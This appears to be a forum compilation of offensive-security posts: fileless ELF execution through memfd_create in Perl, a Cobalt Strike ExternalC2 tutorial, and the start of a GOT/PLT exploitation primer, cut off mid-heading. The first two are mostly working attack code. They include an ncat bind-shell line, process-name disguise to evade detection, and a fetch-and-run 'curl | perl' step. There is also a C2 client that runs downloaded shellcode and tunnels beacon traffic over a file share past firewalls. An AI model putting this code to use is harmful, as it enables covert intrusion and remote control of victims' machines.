    x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
    x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create

Looks like memfd_create(2) is system call number 319 on 64-bit Linux (#define __NR_memfd_create in a file with a name ending in _64.h), and MFD_CLOEXEC is a constant 0x0001U (i.e. 1, in linux/memfd.h). Now that we’ve got the numbers we need, we’re almost ready to do the Perl equivalent of C’s fd = memfd_create(name, MFD_CLOEXEC) (or more specifically, fd = syscall(319, name, MFD_CLOEXEC)).

The last thing we need is a name for our file. In a file listing, /memfd: is probably a bit better-looking than /memfd:kittens, so we’ll pass an empty string to memfd_create(2) via syscall().
Perl’s syscall() won’t take string literals (due to passing a pointer under the hood), so we make a variable with the empty string and use it instead. Putting it together, let’s finally make our anonymous file: my $name = ""; my $fd = syscall(319, $name, 1); if (-1 == $fd) { die "memfd_create: $!"; } We now have a file descriptor number in $fd. We can wrap that up in a Perl one-liner which lists its own file descriptors after making the anonymous file: stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ perl -e '$n="";die$!if-1==syscall(319,$n,1);print`ls -l /proc/$$/fd`' total 0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 0 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 1 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 2 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 3 -> /memfd: (deleted) write(2) Now that we have an anonymous file, we need to fill it with ELF data. First we’ll need to get a Perl filehandle from a file descriptor, then we’ll need to get our data in a format that can be written, and finally, we’ll write it. Perl’s open(), which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like >&=X (where X is a file descriptor) instead of a file name. We’ll also want to enable autoflush on the new file handle: open(my $FH, '>&='.$fd) or die "open: $!"; select((select($FH), $|=1)[0]); We now have a file handle which refers to our anonymous file. Next we need to make our binary available to Perl, so we can write it to the anonymous file. We’ll turn the binary into a bunch of Perl print statements of which each write a chunk of our binary to the anonymous file. 
    perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' ./elfbinary

This will give us many, many lines similar to:

    print $FH pack q/H*/, q/7f454c4602010100000000000000000002003e0001000000304f450000000000/ or die qq/write: $!/;
    print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300/ or die qq/write: $!/;
    print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000/ or die qq/write: $!/;

Executing those puts our ELF binary into memory. Time to run it.

Optional: fork(2)

Ok, fork(2) isn’t actually a system call; it’s really a libc function which does all sorts of stuff under the hood. Perl’s fork() is functionally identical to libc’s as far as process-making goes: once it’s called, there are now two nearly identical processes running (of which one, usually the child, often finds itself calling exec(2)). We don’t actually have to spawn a new process to run our ELF binary, but if we want to do more than just run it and exit (say, run it multiple times), it’s the way to go. In general, using fork() to spawn multiple children looks something like:

    while ($keep_going) {
        my $pid = fork();
        if (!defined $pid) { # Error (Perl's fork() returns undef on failure, not -1)
            die "fork: $!";
        }
        if (0 == $pid) { # Child
            # Do child things here
            exit 0;
        }
    }

Another handy use of fork(), especially when done twice with a call to setsid(2) in the middle, is to spawn a disassociated child and let the parent terminate:

    # Spawn child
    my $pid = fork();
    if (!defined $pid) { # Error
        die "fork1: $!";
    }
    if (0 != $pid) { # Parent terminates
        exit 0;
    }
    # In the child, become session leader
    if (-1 == syscall(112)) {
        die "setsid: $!";
    }
    # Spawn grandchild
    $pid = fork();
    if (!defined $pid) { # Error
        die "fork2: $!";
    }
    if (0 != $pid) { # Child terminates
        exit 0;
    }
    # In the grandchild here, do grandchild things

We can now have our ELF process run multiple times or in a separate process. Let’s do it.

execve(2)

Linux process creation is a funny thing.
Ever since the early days of Unix, process creation has been a combination of not much more than duplicating a current process and swapping out the new clone’s program with what should be running, and on Linux it’s no different. The execve(2) system call does the second bit: it changes one running program into another. Perl gives us exec(), which does more or less the same, albeit with easier syntax.

We pass to exec() two things: the file containing the program to execute (i.e. our in-memory ELF binary) and a list of arguments, of which the first element is usually taken as the process name. Usually, the file and the process name are the same, but since it’d look bad to have /proc/<PID>/fd/3 in a process listing, we’ll name our process something else.

The syntax for calling exec() is a bit odd, and explained much better in the documentation. For now, we’ll take it on faith that the file is passed as a string in curly braces and there follows a comma-separated list of process arguments. We can use the variable $$ to get the pid of our own Perl process. For the sake of clarity, the following assumes we’ve put ncat in memory, but in practice, it’s better to use something which takes arguments that don’t look like a backdoor.

    exec {"/proc/$$/fd/$fd"} "kittens", "-kvl", "4444", "-e", "/bin/sh" or die "exec: $!";

The new process won’t have the anonymous file open as a symlink in /proc/<PID>/fd, but the anonymous file will be visible as the /proc/<PID>/exe symlink, which normally points to the file containing the program which is being executed by the process.

We’ve now got an ELF binary running without putting anything on disk or even in the filesystem.

Scripting it

It’s not likely we’ll have the luxury of being able to sit on target and do all of the above by hand.
Instead, we’ll pipe the script (elfload.pl in the example below) via SSH to Perl’s stdin, and use a bit of shell trickery to keep perl with no arguments from showing up in the process list:

    cat ./elfload.pl | ssh user@target /bin/bash -c '"exec -a /sbin/iscsid perl"'

This will run Perl, renamed in the process list to /sbin/iscsid with no arguments. When not given a script or a bit of code with -e, Perl expects a script on stdin, so we send the script to Perl’s stdin via our local SSH client. The end result is our script is run without touching disk at all.

Without creds but with access to the target (i.e. after exploiting it), in most cases we can probably use the devopsy curl http://server/elfload.pl | perl trick (or intercept someone doing the trick for us). As long as the script makes it to Perl’s stdin and Perl gets an EOF when the script’s all read, it doesn’t particularly matter how it gets there.

Artifacts

Once running, the only real difference between a program running from an anonymous file and a program running from a normal file is the /proc/<PID>/exe symlink. If something’s monitoring system calls (e.g. someone’s running strace -f on sshd), the memfd_create(2) calls will stick out, as will passing paths in /proc/<PID>/fd to execve(2). Other than that, there’s very little evidence anything is wrong.

Demo

To see this in action, have a look at this asciicast.

TL;DR

In C (translate to your non-disk-touching language of choice):

    fd = memfd_create("", MFD_CLOEXEC);
    write(fd, elfbuffer, elfbuffer_len);
    asprintf(&p, "/proc/self/fd/%i", fd);
    execl(p, "kittens", "arg1", "arg2", NULL);

Updated: March 31, 2018

Source: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
  12. Exploring Cobalt Strike's ExternalC2 framework Posted on 30th March 2018 As many testers will know, achieving C2 communication can sometimes be a pain. Whether because of egress firewall rules or process restrictions, the simple days of reverse shells and reverse HTTP C2 channels are quickly coming to an end. OK, maybe I exaggerated that a bit, but it's certainly becoming harder. So, I wanted to look at some alternate routes to achieve C2 communication and with this, I came across Cobalt Strike’s ExternalC2 framework. ExternalC2 ExternalC2 is a specification/framework introduced by Cobalt Strike, which allows hackers to extend the default HTTP(S)/DNS/SMB C2 communication channels offered. The full specification can be downloaded here. Essentially this works by allowing the user to develop a number of components: Third-Party Controller - Responsible for creating a connection to the Cobalt Strike TeamServer, and communicating with a Third-Party Client on the target host using a custom C2 channel. Third-Party Client - Responsible for communicating with the Third-Party Controller using a custom C2 channel, and relaying commands to the SMB Beacon. SMB Beacon - The standard beacon which will be executed on the victim host. Using the diagram from CS's documentation, we can see just how this all fits together: Here we can see that our custom C2 channel is transmitted between the Third-Party Controller and the Third-Party Client, both of which we can develop and control. Now, before we roll up our sleeves, we need to understand how to communicate with the Team Server ExternalC2 interface. First, we need to tell Cobalt Strike to start ExternalC2. This is done with an aggressor script calling the externalc2_start function, and passing a port. Once the ExternalC2 service is up and running, we need to communicate using a custom protocol. 
The protocol is actually pretty straight forward, consisting of a 4 byte little-endian length field, and a blob of data, for example: To begin communication, our Third-Party Controller opens a connection to TeamServer and sends a number of options: arch - The architecture of the beacon to be used (x86 or x64). pipename - The name of the pipe used to communicate with the beacon. block - Time in milliseconds that TeamServer will block between tasks. Once each option has been sent, the Third-Party Controller sends a go command. This starts the ExternalC2 communication, and causes a beacon to be generated and sent. The Third-Party Controller then relays this SMB beacon payload to the Third-Party Client, which then needs to spawn the SMB beacon. Once the SMB beacon has been spawned on the victim host, we need to establish a connection to enable passing of commands. This is done over a named pipe, and the protocol used between the Third-Party Client and the SMB Beacon is exactly the same as between the Third-Party Client and Third-Party Controller... a 4 byte little-endian length field, and trailing data. OK, enough theory, let’s create a “Hello World” example to simply relay the communication over a network. Hello World ExternalC2 Example For this example, we will be using Python on the server side for our Third-Party Controller, and C for our client side Third-Party Client. First, we need our aggressor script to tell Cobalt Strike to enable ExternalC2: # start the External C2 server and bind to 0.0.0.0:2222 externalc2_start("0.0.0.0", 2222); This opens up ExternalC2 on 0.0.0.0:2222. Now that ExternalC2 is up and running, we can create our Third-Party Controller. Let’s first establish our connection to the TeamServer ExternalC2 interface: _socketTS = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) _socketTS.connect(("127.0.0.1", 2222)) Once established, we need to send over our options. 
We will create a few quick helper functions to allow us to prefix our 4 byte length without manually crafting it each time:

    def encodeFrame(data):
        return struct.pack("<I", len(data)) + data

    def sendToTS(data):
        _socketTS.sendall(encodeFrame(data))

Now we can use these helper functions to send over our options:

    # Send out config options
    sendToTS("arch=x86")
    sendToTS("pipename=xpntest")
    sendToTS("block=500")
    sendToTS("go")

Now that Cobalt Strike knows we want an x86 SMB Beacon, we need to receive data. Again let’s create a few helper functions to handle the decoding of packets rather than manually decoding each time:

    def decodeFrame(data):
        # The length prefix is the first 4 bytes; unpack returns a 1-tuple
        length = struct.unpack("<I", data[0:4])[0]
        body = data[4:]
        return (length, body)

    def recvFromTS():
        data = ""
        _len = _socketTS.recv(4)
        l = struct.unpack("<I", _len)[0]
        while len(data) < l:
            data += _socketTS.recv(l - len(data))
        return data

This allows us to receive raw data with:

    data = recvFromTS()

Next, we need to allow our Third-Party Client to connect to us using a C2 protocol of our choice. For now, we are simply going to use the same 4 byte length packet format for our C2 channel protocol. So first, we need a socket for the Third-Party Client to connect to:

    _socketBeacon = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
    _socketBeacon.bind(("0.0.0.0", 8081))
    _socketBeacon.listen(1)
    _socketClient = _socketBeacon.accept()[0]

Then, once a connection is received, we enter our recv/send loop where we receive data from the victim host, forward this onto Cobalt Strike, and receive data from Cobalt Strike, forwarding this to our victim host:

    while(True):
        print "Sending %d bytes to beacon" % len(data)
        sendToBeacon(data)
        data = recvFromBeacon()
        print "Received %d bytes from beacon" % len(data)
        print "Sending %d bytes to TS" % len(data)
        sendToTS(data)
        data = recvFromTS()
        print "Received %d bytes from TS" % len(data)

Our finished example can be found here. Now we have a working controller, we need to create our Third-Party Client.
To make things a bit easier, we will use win32 and C for this, giving us access to the Windows native API. Let’s start with a few helper functions. First, we need to connect to the Third-Party Controller. Here we will simply use WinSock2 to establish a TCP connection to the controller:

    // Creates a new C2 controller connection for relaying commands
    SOCKET createC2Socket(const char *addr, WORD port) {
        WSADATA wsd;
        SOCKET sd;
        SOCKADDR_IN sin;
        WSAStartup(0x0202, &wsd);
        memset(&sin, 0, sizeof(sin));
        sin.sin_family = AF_INET;
        sin.sin_port = htons(port);
        sin.sin_addr.S_un.S_addr = inet_addr(addr);
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
        connect(sd, (SOCKADDR*)&sin, sizeof(sin));
        return sd;
    }

Next, we need a way to receive data. This is similar to what we saw in our Python code, with our length prefix being used as an indicator as to how many data bytes we are receiving:

    // Receives data from our C2 controller to be relayed to the injected beacon
    char *recvData(SOCKET sd, DWORD *len) {
        char *buffer;
        DWORD bytesReceived = 0, totalLen = 0;
        *len = 0;
        recv(sd, (char *)len, 4, 0);
        buffer = (char *)malloc(*len);
        if (buffer == NULL)
            return NULL;
        while (totalLen < *len) {
            bytesReceived = recv(sd, buffer + totalLen, *len - totalLen, 0);
            totalLen += bytesReceived;
        }
        return buffer;
    }

Similarly, we need a way to return data over our C2 channel to the Controller:

    // Sends data to our C2 controller received from our injected beacon
    void sendData(SOCKET sd, const char *data, DWORD len) {
        char *buffer = (char *)malloc(len + 4);
        if (buffer == NULL)
            return;
        DWORD bytesWritten = 0, totalLen = 0;
        // 4 byte length prefix followed by the data itself
        *(DWORD *)buffer = len;
        memcpy(buffer + 4, data, len);
        while (totalLen < len + 4) {
            bytesWritten = send(sd, buffer + totalLen, len + 4 - totalLen, 0);
            totalLen += bytesWritten;
        }
        free(buffer);
    }

Now we have the ability to communicate with our Controller, the first thing we want to do is to receive the beacon payload.
This will be a raw x86 or x64 payload (depending on the options passed by the Third-Party Controller to Cobalt Strike), and is expected to be copied into memory before being executed. For example, let’s grab the beacon payload: // Create a connection back to our C2 controller SOCKET c2socket = createC2Socket("192.168.1.65", 8081); payloadData = recvData(c2socket, &payloadLen); And then for the purposes of this demo, we will use the Win32 VirtualAlloc function to allocate an executable range of memory, and CreateThread to execute the code: HANDLE threadHandle; DWORD threadId = 0; char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (alloc == NULL) return; memcpy(alloc, payload, len); threadHandle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, &threadId); Once the SMB Beacon is up and running, we need to connect to its named pipe. To do this, we will just repeatedly attempt to connect to our \\.\pipe\xpntest pipe (remember, this pipename was passed as an option earlier on, and will be used by the SMB Beacon to receive commands): // Loop until the pipe is up and ready to use while (beaconPipe == INVALID_HANDLE_VALUE) { // Create our IPC pipe for talking to the C2 beacon Sleep(500); beaconPipe = connectBeaconPipe("\\\\.\\pipe\\xpntest"); } And then, once we have a connection, we can continue with our send/recv loop: while (true) { // Start the pipe dance payloadData = recvFromBeacon(beaconPipe, &payloadLen); if (payloadLen == 0) break; sendData(c2socket, payloadData, payloadLen); free(payloadData); payloadData = recvData(c2socket, &payloadLen); if (payloadLen == 0) break; sendToBeacon(beaconPipe, payloadData, payloadLen); free(payloadData); } And that’s it, we have the basics of our ExternalC2 service set up. The full code for the Third-Party Client can be found here. Now, onto something a bit more interesting. 
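The framing used throughout the "Hello World" example above (a 4 byte little-endian length followed by the data) can be sketched in a few lines of Python 3. This is an illustrative sketch rather than the article's controller: the helper names are made up, payloads are bytes instead of Python 2 strings, and a closed connection raises an error instead of looping forever.

```python
import socket
import struct


def encode_frame(payload: bytes) -> bytes:
    """Prefix payload with its length as a 4 byte little-endian integer."""
    return struct.pack("<I", len(payload)) + payload


def recv_exact(sock: socket.socket, count: int) -> bytes:
    """Read exactly count bytes, since recv() may return fewer than requested."""
    chunks = []
    remaining = count
    while remaining:
        chunk = sock.recv(remaining)
        if not chunk:
            raise ConnectionError("peer closed the connection mid-frame")
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


def send_frame(sock: socket.socket, payload: bytes) -> None:
    """Send one length-prefixed frame."""
    sock.sendall(encode_frame(payload))


def recv_frame(sock: socket.socket) -> bytes:
    """Receive one length-prefixed frame and return its body."""
    (length,) = struct.unpack("<I", recv_exact(sock, 4))
    return recv_exact(sock, length)
```

The same two helpers would serve both hops in the example (controller to TeamServer, and controller to client), because the article deliberately reuses one frame format for both.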
Transfer C2 over file

Let’s recap on what it is we control when attempting to create a custom C2 protocol:

From here, we can see that the data transfer between the Third-Party Controller and Third-Party Client is where we get to have some fun. Taking our previous "Hello World" example, let’s attempt to port this into something a bit more interesting, transferring data over a file read/write.

Why would we want to do this? Well, let’s say we are in a Windows domain environment and compromise a machine with very limited outbound access. One thing that is permitted however is access to a file share... see where I’m going with this? By writing C2 data from a machine with access to our C2 server into a file on the share, and reading the data from the firewall’d machine, we have a way to run our Cobalt Strike beacon.

Let’s think about just how this will look:

Here we have actually introduced an additional element, which essentially tunnels data into and out of the file, and communicates with the Third-Party Controller. Again, for the purposes of this example, our communication between the Third-Party Controller and the "Internet Connected Host" will use the familiar 4 byte length prefix protocol, so there is no reason to modify our existing Python Third-Party Controller.

What we will do however, is split our previous Third-Party Client into 2 parts. One is responsible for running on the "Internet Connected Host", receiving data from the Third-Party Controller and writing this into a file. The second runs from the "Restricted Host", reads data from the file, spawns the SMB Beacon, and passes data to this beacon.

I won't go over the elements we covered above, but I'll show one way the file transfer can be achieved. First, we need to create the file we will be communicating over. For this we will just use CreateFileA, however we must ensure that the FILE_SHARE_READ and FILE_SHARE_WRITE options are provided.
This will allow both sides of the Third-Party Client to read and write to the file simultaneously:

    HANDLE openC2FileServer(const char *filepath) {
        HANDLE handle;
        handle = CreateFileA(filepath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if (handle == INVALID_HANDLE_VALUE)
            printf("Error opening file: %x\n", GetLastError());
        return handle;
    }

Next, we need a way of serialising our C2 data into the file, as well as indicating which of the 2 clients should be processing data at any time. To do this, a simple header can be used, for example:

    struct file_c2_header {
        DWORD id;
        DWORD len;
    };

The idea is that we simply poll on the id field, which acts as a signal to each Third-Party Client of who should be reading and who writing data. Putting together our file read and write helpers, we have something that looks like this:

    void writeC2File(HANDLE c2File, const char *data, DWORD len, int id) {
        char *fileBytes = NULL;
        DWORD bytesWritten = 0;
        fileBytes = (char *)malloc(8 + len);
        if (fileBytes == NULL)
            return;
        // Add our file header
        *(DWORD *)fileBytes = id;
        *(DWORD *)(fileBytes+4) = len;
        memcpy(fileBytes + 8, data, len);
        // Make sure we are at the beginning of the file
        SetFilePointer(c2File, 0, 0, FILE_BEGIN);
        // Write our C2 data in
        WriteFile(c2File, fileBytes, 8 + len, &bytesWritten, NULL);
        printf("[*] Wrote %d bytes\n", bytesWritten);
        // Release the temporary buffer once it has been written out
        free(fileBytes);
    }

    char *readC2File(HANDLE c2File, DWORD *len, int expect) {
        char header[8];
        DWORD bytesRead = 0;
        char *fileBytes = NULL;
        memset(header, 0xFF, sizeof(header));
        // Poll until we have our expected id in the header
        while (*(DWORD *)header != expect) {
            SetFilePointer(c2File, 0, 0, FILE_BEGIN);
            ReadFile(c2File, header, 8, &bytesRead, NULL);
            Sleep(100);
        }
        // Read out the expected length from the header
        *len = *(DWORD *)(header + 4);
        fileBytes = (char *)malloc(*len);
        if (fileBytes == NULL)
            return NULL;
        // Finally, read out our C2 data
        ReadFile(c2File, fileBytes, *len, &bytesRead, NULL);
        printf("[*] Read %d bytes\n", bytesRead);
        return fileBytes;
    }

Here we see that we are adding our header to the file, and reading and writing C2 data from and to the file respectively.

And that is pretty much all there is to it. All that is left to do is implement our recv/write/read/send loop and we have C2 operating across a file transfer. The full code for the above Third-Party Controller can be found here.

Let's see this in action:

If you are interested in learning more about ExternalC2, there are a number of useful resources which can be found over at the Cobalt Strike ExternalC2 help page, https://www.cobaltstrike.com/help-externalc2.

Sursa: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/
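The id/len header and polling scheme from the file-transfer section above can also be sketched in Python. This is a hedged illustration, not the article's client: the function names, the optional timeout and the use of ordinary Python file objects (instead of CreateFileA with sharing flags) are all assumptions made for the example, and like the C version it does not guard against a reader seeing a half-written frame.

```python
import os
import struct
import time

# Same layout as struct file_c2_header: two little-endian DWORDs, id then len.
HEADER = struct.Struct("<II")


def write_c2_file(path: str, data: bytes, frame_id: int) -> None:
    """Write header plus data at the start of the shared file."""
    frame = HEADER.pack(frame_id, len(data)) + data
    # Overwrite in place if the file exists, otherwise create it.
    mode = "r+b" if os.path.exists(path) else "w+b"
    with open(path, mode) as handle:
        handle.seek(0)
        handle.write(frame)


def read_c2_file(path: str, expect_id: int, poll_interval: float = 0.1,
                 timeout: float = None) -> bytes:
    """Poll the shared file until its header carries expect_id, then return the data."""
    deadline = None if timeout is None else time.monotonic() + timeout
    while True:
        try:
            with open(path, "rb") as handle:
                header = handle.read(HEADER.size)
                if len(header) == HEADER.size:
                    frame_id, length = HEADER.unpack(header)
                    if frame_id == expect_id:
                        # Only read len bytes; older, longer frames may leave stale data behind.
                        return handle.read(length)
        except FileNotFoundError:
            pass  # the other side has not created the file yet
        if deadline is not None and time.monotonic() >= deadline:
            raise TimeoutError("no frame with the expected id appeared")
        time.sleep(poll_interval)
```

Each side would use a different id for the frames it writes and poll for the other side's id, which is the signalling role the id field plays in the article.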
  13. GOT and PLT for pwning.

19 Mar 2017 in Security. Tags: Pwning, Linux

So, during the recent 0CTF, one of my teammates was asking me about RELRO and the GOT and the PLT and all of the ELF sections involved. I realized that though I knew the general concepts, I didn’t know as much as I should, so I did some research to find out some more. This is documenting the research (and hoping it’s useful for others).

All of the examples below will be on an x86 Linux platform, but the concepts all apply equally to x86-64. (And, I assume, other architectures on Linux, as the concepts are related to ELF linking and glibc, but I haven’t checked.)

High-Level Introduction

So what is all of this nonsense about? Well, there are two types of binaries on any system: statically linked and dynamically linked. Statically linked binaries are self-contained, containing all of the code necessary for them to run within the single file, and do not depend on any external libraries. Dynamically linked binaries (which are the default when you run gcc and most other compilers) do not include a lot of functions, but rely on system libraries to provide a portion of the functionality. For example, when your binary uses printf to print some data, the actual implementation of printf is part of the system C library. Typically, on current GNU/Linux systems, this is provided by libc.so.6, which is the name of the current GNU Libc library.

In order to call these functions, your program needs to know their addresses, for example the address of printf. While this could be written into the raw binary at compile time, there are some problems with that strategy:

- Each time the library changes, the addresses of the functions within the library change. When libc is upgraded, you’d need to rebuild every binary on your system. While this might appeal to Gentoo users, the rest of us would find it an upgrade challenge to replace every binary every time libc received an update.
- Modern systems using ASLR load libraries at different locations on each program invocation. Hardcoding addresses would render this impossible.

Consequently, a strategy was developed to allow looking up all of these addresses when the program was run and providing a mechanism to call these functions from libraries. This is known as relocation, and the hard work of doing this at runtime is performed by the linker, aka ld-linux.so. (Note that every dynamically linked program will be linked against the linker; this is actually set in a special ELF section called .interp.) The linker is actually run before any code from your program or libc, but this is completely abstracted from the user by the Linux kernel.

Relocations

Looking at an ELF file, you will discover that it has a number of sections, and it turns out that relocations require several of these sections. I’ll start by defining the sections, then discuss how they’re used in practice.

- .got: This is the GOT, or Global Offset Table. This is the actual table of offsets as filled in by the linker for external symbols.
- .plt: This is the PLT, or Procedure Linkage Table. These are stubs that look up the addresses in the .got.plt section, and either jump to the right address, or trigger the code in the linker to look up the address (if the address has not been filled in to .got.plt yet).
- .got.plt: This is the GOT for the PLT. It contains the target addresses (after they have been looked up) or an address back in the .plt to trigger the lookup. Classically, this data was part of the .got section.
- .plt.got: It seems like they wanted every combination of PLT and GOT! This just seems to contain code to jump to the first entry of the .got. I’m not actually sure what uses this. (If you know, please reach out and let me know! In testing a couple of programs, this code is not hit, but maybe there’s some obscure case for this.)
TL;DR: Those starting with .plt contain stubs to jump to the target, those starting with .got are tables of the target addresses.

Let’s walk through the way a relocation is used in a typical binary. We’ll include two libc functions, puts and exit, and show the state of the various sections as we go along. Here’s our source:

    // Build with: gcc -m32 -no-pie -g -o plt plt.c

    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char **argv) {
      puts("Hello world!");
      exit(0);
    }

Let’s examine the section headers:

    There are 36 section headers, starting at offset 0x1fb4:

    Section Headers:
      [Nr] Name      Type      Addr     Off    Size   ES Flg Lk Inf Al
      [12] .plt      PROGBITS  080482f0 0002f0 000040 04  AX  0   0 16
      [13] .plt.got  PROGBITS  08048330 000330 000008 00  AX  0   0  8
      [14] .text     PROGBITS  08048340 000340 0001a2 00  AX  0   0 16
      [23] .got      PROGBITS  08049ffc 000ffc 000004 04  WA  0   0  4
      [24] .got.plt  PROGBITS  0804a000 001000 000018 04  WA  0   0  4

I’ve left only the sections I’ll be talking about; the full program has 36 sections!

So let’s walk through this process with the use of GDB. (I’m using the fantastic GDB environment provided by pwndbg, so some UI elements might look a bit different from vanilla GDB.)
We’ll load up our binary and set a breakpoint just before puts gets called and then examine the flow step-by-step:

    pwndbg> disass main
    Dump of assembler code for function main:
       0x0804843b <+0>:     lea    ecx,[esp+0x4]
       0x0804843f <+4>:     and    esp,0xfffffff0
       0x08048442 <+7>:     push   DWORD PTR [ecx-0x4]
       0x08048445 <+10>:    push   ebp
       0x08048446 <+11>:    mov    ebp,esp
       0x08048448 <+13>:    push   ebx
       0x08048449 <+14>:    push   ecx
       0x0804844a <+15>:    call   0x8048370 <__x86.get_pc_thunk.bx>
       0x0804844f <+20>:    add    ebx,0x1bb1
       0x08048455 <+26>:    sub    esp,0xc
       0x08048458 <+29>:    lea    eax,[ebx-0x1b00]
       0x0804845e <+35>:    push   eax
       0x0804845f <+36>:    call   0x8048300 <puts@plt>
       0x08048464 <+41>:    add    esp,0x10
       0x08048467 <+44>:    sub    esp,0xc
       0x0804846a <+47>:    push   0x0
       0x0804846c <+49>:    call   0x8048310 <exit@plt>
    End of assembler dump.
    pwndbg> break *0x0804845f
    Breakpoint 1 at 0x804845f: file plt.c, line 7.
    pwndbg> r
    Breakpoint *0x0804845f
    pwndbg> x/i $pc
    => 0x804845f <main+36>: call   0x8048300 <puts@plt>

Ok, we’re about to call puts. Note that the address being called is local to our binary, in the .plt section, hence the special symbol name of puts@plt. Let’s step through the process until we get to the actual puts function.

    pwndbg> si
    pwndbg> x/i $pc
    => 0x8048300 <puts@plt>:        jmp    DWORD PTR ds:0x804a00c

We’re in the PLT, and we see that we’re performing a jmp, but this is not a typical jmp. This is what a jmp to a function pointer would look like. The processor will dereference the pointer, then jump to the resulting address.

Let’s check the dereference and follow the jmp. Note that the pointer is in the .got.plt section as we described above.

    pwndbg> x/wx 0x804a00c
    0x804a00c:      0x08048306
    pwndbg> si
    0x08048306 in puts@plt ()
    pwndbg> x/2i $pc
    => 0x8048306 <puts@plt+6>:      push   0x0
       0x804830b <puts@plt+11>:     jmp    0x80482f0

Well, that’s weird. We’ve just jumped to the next instruction! Why has this occurred?
Well, it turns out that because we haven’t called puts before, we need to trigger the first lookup. It pushes the slot number (0x0) on the stack, then calls the routine to look up the symbol name. This happens to be the beginning of the .plt section. What does this stub do? Let’s find out.

    pwndbg> si
    pwndbg> si
    pwndbg> x/2i $pc
    => 0x80482f0: push   DWORD PTR ds:0x804a004
       0x80482f6: jmp    DWORD PTR ds:0x804a008

Now, we push the value of the second entry in .got.plt, then jump to the address stored in the third entry. Let’s examine those values and carry on.

    pwndbg> x/2wx 0x804a004
    0x804a004:  0xf7ffd918  0xf7fedf40

Wait, where is that pointing? It turns out the first one points into the data segment of ld.so, and the second into the executable area:

    0xf7fd9000 0xf7ffb000 r-xp    22000 0      /lib/i386-linux-gnu/ld-2.24.so
    0xf7ffc000 0xf7ffd000 r--p     1000 22000  /lib/i386-linux-gnu/ld-2.24.so
    0xf7ffd000 0xf7ffe000 rw-p     1000 23000  /lib/i386-linux-gnu/ld-2.24.so

Ah, finally, we’re asking for the information for the puts symbol! These two addresses in the .got.plt section are populated by the linker/loader (ld.so) at the time it is loading the binary.

So, I’m going to treat what happens in ld.so as a black box. I encourage you to look into it, but exactly how it looks up the symbols is a little bit too low level for this post. Suffice it to say that eventually we will reach a ret from the ld.so code that resolves the symbol.

    pwndbg> x/i $pc
    => 0xf7fedf5b:  ret    0xc
    pwndbg> ni
    pwndbg> info symbol $pc
    puts in section .text of /lib/i386-linux-gnu/libc.so.6

Look at that, we find ourselves at puts, exactly where we’d like to be. Let’s see how our stack looks at this point:

    pwndbg> x/4wx $esp
    0xffffcc2c: 0x08048464  0x08048500  0xffffccf4  0xffffccfc
    pwndbg> x/s *(int *)($esp+4)
    0x8048500:  "Hello world!"

Absolutely no trace of the trip through .plt, ld.so, or anything but what you’d expect from a direct call to puts.
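The lazy lookup traced above can be modelled in plain C with a table of function pointers. This is only a toy sketch of the idea, not what ld.so actually does: the names got_plt, lazy_stub, resolve_slot and call_double are made up for illustration, and real_double stands in for a libc function such as puts.

```c
#include <assert.h>
#include <stddef.h>

typedef int (*func_ptr)(int);

/* Counts how many times the (toy) resolver had to run. */
static int resolver_calls = 0;

/* Stand-in for a function that lives in a shared library. */
static int real_double(int x) { return 2 * x; }

static int lazy_stub(int x);

/* Toy ".got.plt": one slot, initially pointing back at the lazy stub,
 * much like the real slot initially points at puts@plt+6. */
static func_ptr got_plt[1] = { lazy_stub };

/* Toy resolver playing the role of ld.so: patch the slot with the
 * real address so later calls skip the lookup. */
static func_ptr resolve_slot(size_t slot)
{
    resolver_calls++;
    got_plt[slot] = real_double;
    return got_plt[slot];
}

/* First-call path: resolve slot 0, then continue into the real function. */
static int lazy_stub(int x)
{
    return resolve_slot(0)(x);
}

/* Toy PLT stub: always an indirect jump through the table slot. */
int call_double(int x)
{
    return got_plt[0](x);
}

int resolver_call_count(void)
{
    return resolver_calls;
}
```

Calling call_double twice runs the resolver only on the first call; the second call goes straight through the patched slot. The writable slot is also the part an attacker would want to overwrite.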
Unfortunately, this seemed like a long trip to get from main to puts. Do we have to go through that every time? Fortunately, no. Let’s look at our entry in .got.plt again, disassembling puts@plt to verify the address first:

    pwndbg> disass 'puts@plt'
    Dump of assembler code for function puts@plt:
       0x08048300 <+0>:     jmp    DWORD PTR ds:0x804a00c
       0x08048306 <+6>:     push   0x0
       0x0804830b <+11>:    jmp    0x80482f0
    End of assembler dump.
    pwndbg> x/wx 0x804a00c
    0x804a00c:  0xf7e4b870
    pwndbg> info symbol 0xf7e4b870
    puts in section .text of /lib/i386-linux-gnu/libc.so.6

So now, a call to puts@plt results in an immediate jmp to the address of puts as loaded from libc. At this point, the overhead of the relocation is one extra jmp. (Ok, and dereferencing the pointer which might cause a cache load, but I suspect the GOT is very often in L1 or at least L2, so very little overhead.)

How did the .got.plt get updated? That’s why a pointer to the beginning of the GOT was passed as an argument back to ld.so. ld.so did magic and inserted the proper address in the GOT to replace the previous address which pointed to the next instruction in the PLT.

Pwning Relocations

